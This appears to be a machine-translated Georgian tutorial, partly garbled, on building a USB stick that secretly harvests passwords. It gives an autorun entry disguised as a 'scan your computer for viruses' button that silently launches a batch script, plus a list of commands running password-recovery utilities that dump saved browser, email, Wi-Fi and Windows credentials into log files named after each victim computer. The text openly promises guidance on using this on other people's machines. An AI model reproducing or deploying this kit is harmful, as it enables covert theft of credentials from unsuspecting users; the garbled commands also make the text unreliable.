ჩვეულებრივ Notepad-ში. , წაიკითხეთ აქ. დოკუმენტი შეიცავს კოდს უტილიტების ავტომატური გაშვებისა და შესაბამის ტექსტურ ფაილებში შესანახად. შეგიძლიათ გადაარქვათ სახელი და ნახოთ მისი შემადგენლობა იმავე Notepad-ის გამოყენებით. Batch ფაილის გაშვების შემდეგ, თითოეული პროგრამა გაიხსნება ცალკე ფანჯარაში თქვენი (ან სხვა ადამიანების) პაროლით და/ან შეეცდება შექმნას ტექსტური ფაილი, რომელშიც ნაჩვენები იქნება ნაპოვნი პაროლები. ოპერა, Firefox, Internet Explorer, ელექტრონული ფოსტის კლიენტები და თავად ფანჯრები. ყველაფერს რამდენიმე წამი დასჭირდება. ივარჯიშეთ თქვენს კომპიუტერზე ნელა. ჩვენ განვიხილავთ, თუ როგორ გამოვიყენოთ შეძენილი უნარები სხვის კომპიუტერზე სწორად, სწრაფად და რაც შეიძლება ფრთხილად, ერთ-ერთ შემდეგ სტატიაში. წაიკითხეთ: 321
ყველა კომუნალური ტექნიკის აღება შესაძლებელია.
ფლეშ დრაივი:\prog\
ფლეშ დრაივი:\prog\log\
open=prog/hstart /NOCONSOLE "launch.bat"
ACTION= დაასკანირეთ თქვენი კომპიუტერი ვირუსებზე
აქ მოქმედება არის ღილაკი, რომელიც გამოჩნდება მოქმედების შერჩევის ფანჯარაში, როდესაც ფლეშ დრაივი არის დაკავშირებული, და გახსნა არის ბრძანება, რომელიც უნდა შესრულდეს ამ მოქმედების არჩევისას. ეს ბრძანება მოიცავს სერიული ფაილის გაშვებას დამალულ რეჟიმში დამალული დაწყება პროგრამის გამოყენებით.
echo %computername%\%username% bte% %time% >> prog/log/_log.txt
დაწყება prog/ChromePass.exe /text prog/log/%computername%_chrom.txt
დაწყება prog/Dialupass.exe /stext prog/log/%computername%_dialupass.txt
დაწყება prog/iepv.exe /sext prog/log/%computername%_iepv.txt
დაწყება prog/mailpv.exe /text prog/log/%computername%_mailpv.txt
დაწყება prog/mspass.exe /stext prog/log/%computername%_mspass.txt
დაწყება prog/netpass.exe /sext prog/log/%computername%_netpass.txt
დაწყება prog/pspv.exe /text prog/log/%computername%_pspv.txt
დაწყება prog/PstPassword.exe /text prog/log/%computername%_pstpassword.txt
დაწყება prog/WirelessKeyView.exe /text prog/log/%computername%_wirelesskeyview.txt
დაწყება prog/PasswordFox.exe /text prog/log/%computername%_passwordfox.txt
:Დასასრული
დაიწყეთ prog/KK.exe
მისი მიზანია დაიცვას თქვენი მონაცემები თავდამსხმელისგან.
ვინც იცის, შეიარაღებულია!ქუქიების ქურდობა
როგორ მოვიპაროთ პაროლები Windows-იდან?
